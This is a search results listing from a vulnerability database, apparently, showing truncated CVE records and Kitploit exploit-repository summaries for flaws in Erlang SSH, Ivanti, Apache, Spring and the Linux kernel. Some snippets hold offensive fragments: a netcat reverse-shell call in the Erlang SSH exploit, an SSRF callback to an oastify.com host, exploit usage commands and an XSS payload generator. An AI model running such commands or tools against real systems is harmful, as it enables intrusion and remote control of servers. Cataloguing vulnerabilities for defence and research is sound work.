Lucene search
+L

135580 matches found

Kitploit
Kitploit
•added 2026/09/25 10:57 a.m.•9 views

CVE-2019-13497

CVE-2019-13497 エクスプロイトタイトル: Cross Site Request Forgery CSRF 日付: 07/10/2019 エクスプロイト作成者: Furqan Khan ベンダーホームページ: https://www.oneidentity.com/ ソフトウェアリンク: https://www.oneidentity.com/products/cloud-access-manager/ バージョン: 8.1.3 テスト環境: Kali Linux , Windows 7 ,Ubantu 16.04...

6.5CVSS6.8AI score0.00732EPSS
SaveExploits2
Kitploit
Kitploit
•added 2026/09/25 10:57 a.m.•7 views

CVE-2022-22954

CVE-2022-22954 脆弱性の説明 Workspace ONE Access は統合アプリケーションポータルを提供し、このポータルを介して企業のすべてのアプリケーションに安全にアクセスでき、シングルサインオンに使用できます。CVE-2022-22954 では、攻撃者が悪意のあるリクエストを構築してテンプレートインジェクションを引き起こし、任意のコードを実行し、サーバーを制御する可能性があります。 参考記事...

10CVSS8.8AI score0.99998EPSS
SaveExploits25
Kitploit
Kitploit
•added 2026/09/25 10:55 a.m.•13 views

CVE-2020-35391

CVE-2020-35391 Tenda f3 の不正なHTTPリクエストヘッダ処理の脆弱性。 実行方法 root@kitploit: python3 CVE-2020-35391.py --help python3 CVE-2020-35391.py python3 CVE-2020-35391.py -i http://127.0.0.1:8080 python3 CVE-2020-35391.py -l ip.txt Tenda F3 Shodan Dork エクスプロイト...

9.6CVSS8AI score0.35248EPSS
SaveExploits4
Kitploit
Kitploit
•added 2026/09/25 10:54 a.m.•8 views

Spring4shell-CVE-2022-22965-POC

Spring4shell RCE 脆弱性 この脆弱性は Spring Core に影響し、攻撃者が特別に細工された HTTP リクエストを送信することで、ライブラリの HTTP リクエストパーサーの保護をバイパスし、リモートコード実行を引き起こす可能性があります。 詳細情報はこちら この脆弱性が悪用されるためには、いくつかの条件を満たす必要があります JDK 9 以降を使用している Apache Tomcat をサーブレットコンテナとして使用している 従来の WAR としてパッケージ化されている(Spring Boot 実行可能 jar とは対照的) spring-webmvc または...

9.8CVSS8AI score0.99638EPSS
SaveExploits105
Kitploit
Kitploit
•added 2026/09/25 10:48 a.m.•9 views

CVE-2024-57241

CVE-2024-57241CNNVD-2024-34500830 For web applications using DEDECMS 5.71SP1 and earlier, URL redirects occur because the source code logic error of the CMS does not judge the input GET request DEDECMS 5.71SP1以下のバージョンを使用するWebアプリケーションでは、CMSのソースコード論理エラーにより入力されたGETリクエストが判断されず、URLリダイレクトが発生します。 How to...

5.8AI score0.01157EPSS
SaveExploits0
Kitploit
Kitploit
•added 2026/09/25 10:46 a.m.•10 views

CVE-2024-57373

LifestyleStore v1.0 における CSRF 脆弱性 📌 概要 このリポジトリは、LifestyleStore v1.0 プロジェクトで特定されたクロスサイトリクエストフォージェリ CSRF 脆弱性を文書化しています。この欠陥により、攻撃者は認証されたユーザーに代わって不正なアクションを実行でき、データの整合性やアカウントのセキュリティにリスクをもたらします。 🛠️ 技術的詳細 タイプ : CSRF クロスサイトリクエストフォージェリ 影響 : データの変更やアカウント侵害などの不正アクション。 影響を受けるバージョン : LifestyleStore v1.0 深刻度 : ...

5.9AI score0.00385EPSS
SaveExploits0
Cvelist
Cvelist
•added 2026/09/25 10:36 a.m.•35 views

CVE-2026-98150 bpf: Fix BPF_F_CPU validation for sparse CPU IDs

In the Linux kernel, the following vulnerability has been resolved: bpf: Fix BPFFCPU validation for sparse CPU IDs BPFFCPU stores the target CPU ID in the upper 32 bits of the map operation flags. bpfmapcheckopflags currently compares that ID with numpossiblecpus, which is the number of possible...

7CVSS0.00101EPSS
SaveExploits0References2
EUVD
EUVD
•added 2026/09/25 10:36 a.m.•8 views

EUVD-2026-86981

In the Linux kernel, the following vulnerability has been resolved: bpf: Fix BPFFCPU validation for sparse CPU IDs BPFFCPU stores the target CPU ID in the upper 32 bits of the map operation flags. bpfmapcheckopflags currently compares that ID with numpossiblecpus, which is the number of possible...

7CVSS5.8AI score0.00101EPSS
SaveExploits0References2
OSV
OSV
•added 2026/09/25 10:36 a.m.•4 views

CVE-2026-98150 bpf: Fix BPF_F_CPU validation for sparse CPU IDs

In the Linux kernel, the following vulnerability has been resolved: bpf: Fix BPFFCPU validation for sparse CPU IDs BPFFCPU stores the target CPU ID in the upper 32 bits of the map operation flags. bpfmapcheckopflags currently compares that ID with numpossiblecpus, which is the number of possible...

7CVSS5.8AI score
SaveExploits0References5
CVE
CVE
•added 2026/09/25 10:36 a.m.•15 views

CVE-2026-98150

The Linux kernel contains a vulnerability in the BPF subsystem where bpf_map_check_op_flags() incorrectly validates BPF_F_CPU flags. Instead of checking against a bound on CPU IDs, it compares the ID against num_possible_cpus(). This allows for the incorrect acceptance of CPU IDs in sparse config...

7CVSS5.8AI score0.00101EPSS
SaveExploits0References2
Kitploit
Kitploit
•added 2026/09/25 10:33 a.m.•10 views

CVE-2025-3243

CVE-2025-32433 Erlang SSHライブラリのエクスプロイト CVE-2025-32433 の概念実証エクスプロイトです。これはErlangのSSHライブラリにおける深刻な脆弱性であり、不正な SSHMSGCHANNELREQUEST パケットによって認証前のコード実行を可能にします。 特徴 オリジナルエクスプロイト : Matthew Keeley 氏 更新版 : Tyler Ramsbey 氏 LHOST 、LPORT 、RHOST 、RPORT のコマンドライン引数 argparse によるビルトインのヘルプと使用方法 os:cmd"nc LHOST LPORT -...

10CVSS7.7AI score0.98786EPSS
SaveExploits41References1
Debian CVE
Debian CVE
•added 2026/09/25 10:22 a.m.•7 views

CVE-2026-97614

In the Linux kernel, the following vulnerability has been resolved: net: dsa: tagbrcm: legacy FCS: request needed tailroom The legacy FCS tagger calculates the CRC over skb-len bytes starting at skb-data. When a nonlinear skb reaches the tagger, this reads past the linear head into unrelated slab...

6.2AI score0.00198EPSS
SaveExploits0
Kitploit
Kitploit
•added 2026/09/25 10:22 a.m.•14 views

CVE-2023-25690

CVE-2023-25690 CVE-2023-25690の説明: Apache HTTP Server バージョン 2.4.0 から 2.4.55 における modproxy の特定の設定は、HTTP Request Smuggling(1人または複数のユーザーから受信したHTTPリクエストチェーンをWebサイトが処理するプロセスに干渉する攻撃手法)を許容します。 これらの設定は、modproxy が特定の RewriteRule または ProxyPassMatch...

9.8CVSS7.4AI score0.84508EPSS
SaveExploits6
Kitploit
Kitploit
•added 2026/09/25 10:02 a.m.•12 views

cve-2022-21907

CVE-2022-21907 Este paquete detecta exploits de CVE-2022-21907 https://corelight.com/blog/detecting-cve-2022-21907 Método de detección: HTTP Los datos HTTP deben ser = 1750 bytes, y No se observa HTTP/1.1 al final de la solicitud HTTP del exploit. Uso: root@kitploit: $ zeek -Cr your.pcap packages...

10CVSS8.5AI score0.9279EPSS
SaveExploits21
Kitploit
Kitploit
•added 2026/09/25 10:00 a.m.•7 views

CVE-2023-25690_lab

Apacheプロキシ経由のHTTPリクエストスマグリング 環境設定 インフラストラクチャ...

9.8CVSS7.4AI score0.84508EPSS
SaveExploits6
Kitploit
Kitploit
•added 2026/09/25 9:52 a.m.•9 views

log4jail

log4jail 🛡️ Log4J(Log4Shell、別名CVE-2021-44228)攻撃を防ぐための、TLS(HTTPS)とスウォーム対応の高速ファイアウォールリバースプロキシ。 📖 目次 はじめに インストール クイックスタート 概念実証 ペネトレーションテスター向け ℹ️ はじめに log4jail は、リクエスト本文全体(すべてのヘッダーとリクエストパラメータを含む)をスキャンしてlog4shellペイロードを検出するリバースプロキシとして機能することで、Log4Shellのエクスプロイト試行をブロックするための簡易的なソリューションです。 💡...

10CVSS7.7AI score0.99999EPSS
SaveExploits375References1
Kitploit
Kitploit
•added 2026/09/25 9:52 a.m.•12 views

poc-h2-CVE-2026-71554

CVE-2026-71554 - h2 Duplicate Host Header Request Smuggling Primitive This is my first CVE, and I have released this PoC to document the finding and help others understand and reproduce it. CVE: CVE-2026-71554 GHSA: GHSA-6hr6-w5qg-qmwg Affected: h2 = 4.4.0 Fixed: h2 4.4.1 Severity: Medium CWE-444...

5.3CVSS6AI score0.00418EPSS
SaveExploits1
Kitploit
Kitploit
•added 2026/09/25 9:44 a.m.•11 views

CVE-2024-21893.py

CVE-2024-21893 は、Ivanti Connect Secure 9.x, 22.x および Ivanti Policy Secure 9.x, 22.x および Ivanti Neurons for ZTA の SAML コンポーネントにおけるサーバーサイドリクエストフォージェリの脆弱性であり、攻撃者が認証なしで特定の制限されたリソースにアクセスできるようになります。 python CVE-2024-21893.py -u target.com -a http://xxxxxxxxx.oastify.com を実行します。 RCE root@kitploit: POST...

8.2CVSS8.4AI score0.99999EPSS
SaveExploits5
Kitploit
Kitploit
•added 2026/09/25 9:39 a.m.•14 views

CLZero

CLZero HTTP/1.1 CL.0 요청 스머글링 공격 벡터를 퍼징하기 위한 프로젝트입니다. 소개 도구가 존재할 수 있게 해준 @albinowax, @defparam, @d3d에게 감사드립니다. Smuggler 도구에서 영감을 받았으며, 모든 공격 가젯은 Smuggler와 https://portswigger.net/research/how-to-turn-security-research-into-profit 에서 가져왔습니다. 자세한 내용은...

6.2AI score
SaveExploits0References2
Kitploit
Kitploit
•added 2026/09/25 9:31 a.m.•91 views

xssless

xssless An automated XSS payload generator written in python. Usage 1. Record requests with Burp proxy 2. Select requests you want to generate, then right click and select "Save items" 3. Use xssless to generate your payload: ./xssless.py burpexportfile 4. Pwn! A more detailed tutorial can be fou...

6AI score
SaveExploits0
Rows per page
Query Builder